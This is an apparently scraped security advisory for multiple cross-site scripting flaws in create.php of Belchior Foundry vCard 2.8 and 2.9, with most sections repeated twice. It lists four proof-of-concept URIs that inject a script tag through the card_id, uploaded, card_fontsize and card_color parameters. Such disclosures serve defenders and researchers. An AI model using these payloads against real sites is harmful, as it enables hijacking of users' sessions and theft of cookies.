vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
BID:17073
Info
vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 17073 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 11 2006 12:00AM |
| Updated: | Mar 14 2006 01:45AM |
| Credit: | Linux_Drox is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Belchior Foundry vCard 2.9 Belchior Foundry vCard 2.8 |
| Not Vulnerable: | |
Discussion
vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>
Solution / Fix
vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
References
vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- vCard Pro Web Page (Belchior Foundry)
- XSS in vCard ([email protected])